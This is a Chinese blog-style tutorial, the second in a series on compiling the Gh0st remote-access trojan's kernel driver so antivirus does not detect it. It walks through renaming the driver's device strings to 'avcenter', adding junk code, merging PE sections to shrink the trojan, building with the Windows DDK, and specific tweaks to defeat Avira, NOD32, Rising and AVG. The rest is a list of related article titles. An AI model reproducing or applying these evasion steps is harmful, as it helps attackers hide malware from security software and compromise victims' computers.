Gh0st编译免杀系列教程2_驱动文件编译方法1
来源:互联网 发布:剑灵捏脸数据哪里下载 编辑:程序博客网 时间:2024/05/22 14:17
命令行编译驱动
1.改RESSDT字符串(一共5个地方)
先搜索RESSDT,改为什么都行,比如我改为avcenter
// RtlInitUnicodeString(&DerName,L"//Device//RESSDT");
RtlInitUnicodeString(&DerName,L"//Device//avcenter");
// RtlInitUnicodeString(&DerName2,L"//??//RESSDTDOS");
RtlInitUnicodeString(&DerName2,L"//??//avcenterDOS");
// hDriver = CreateFileA( "////.//RESSDTDOS",
hDriver = CreateFileA( "////.//avcenterDOS",
//TARGETNAME=RESSDT //这个得搜索所有文件才可以搜索到了,这个是生成驱动的名称
TARGETNAME=avcenter
//SOURCE=../sys/RESSDT.sys(这里不能用注释符号 ../../bin/RESSDT.sys表示生成到Bin目录里去)
SOURCE=../../bin/avcenter.sys
还得改下上个教程里sys资源调用:
//IDR_SYS BIN DISCARDABLE "..//sys//RESSDT.sys"
IDR_SYS BIN DISCARDABLE "..//..//bin//avcenter.sys"
2.然后再给驱动文件加点花指令,或者也可以再把那个DbgPrint前的注释去掉
或者加个sprintf也可以:
#include <stdio.h> //先加个文件头
sprintf("aaaaaaa", "bbbbbbbbb", 123);
反正改的越多杀软就越难查杀
3.还可以合并下区段:合并区段是个很重要的方法,特别是在下个教程里你可以看到它的效果
#pragma comment(linker, "/merge:.rdata=.data ") //把.rdata区段合并到.data里去
#pragma comment(linker, "/merge:.text=.data ") //把.text区段合并到.data里去
合并后驱动文件的大小就由3K变成了2K了,这个还可以使你的木马变小
4.
在命令行编译驱动也有两个方法,第二个方法快点...
—————————————————————————————————————————————————
改完后把Server里的sys文件夹复制到DDK安装目录里,然后在cmd里运行命令
cd/ (来到C盘根目录)
C:/WINDDK/2600/bin/setenv.bat C:/WINDDK/2600 chk (这个命令得看你的DDK安装在哪)
cd sys (进入sys目录)
build (编译sys文件)
—————————————————————————————————————————————————
或者直接来到这里,进入sys文件夹去编译
开始/Development Kits/Windows DDK 2600/Build Environments/Win XP Free Build Environment
—————————————————————————————————————————————————
改下输入表的大小看看过瑞星不?
编译生成之后再去看看sys文件里的字符串哪些变了
这样改后还是有很多杀软会杀的,再给驱动文件加个输入表就可以免杀很多,但我现在还不会,呵呵
5.手动免杀其他杀软
小红伞:移动ntoskrnl.exe到驱动文件的最后
nod32:改子系统
瑞星:改输出表大小为30
avg:填充掉文件头上的那些东西
改后就剩下两个杀软杀了
- Gh0st编译免杀系列教程2_驱动文件编译方法1
- gh0st免杀准备
- gh0st3.6源码编译+++免杀教程
- GH0ST编译步骤
- vs2008下编译gh0st ,dxtrans.h文件不能找到
- 免杀gh0st过瑞星
- VS 2010编译Gh0st 3.6
- Gh0st --- 可正常编译连接
- VS 2010编译Gh0st 3.6
- 网络安全:gh0st源码免杀360全套(2)
- 网络安全:gh0st源码免杀360全套(1)
- gh0st编译环境,DirectShow编译环境
- mysql linux免编译版 安装教程
- 编译驱动ko文件
- 驱动编译方法
- 编译mysql驱动方法
- 网络安全:gh0st源码免杀ESET_NOD32
- 网络安全:gh0st源码免杀Kaspersky
- gh0st免杀准备
- 主要在于WIN API的理解。
- win api 的理解
- mysql里面如何方便快捷更新存储过程!
- od 快捷键
- Gh0st编译免杀系列教程2_驱动文件编译方法1
- JFreeChart开发步骤
- xn
- ComparableInterface
- Comparator Interface
- 有向图 两点间的最短距离
- 有状态会话Bean(SLSB)和无状态会话Bean(SFSB)的区别
- 获取系统信息
- windows 正则表达式 工具 PowerGREP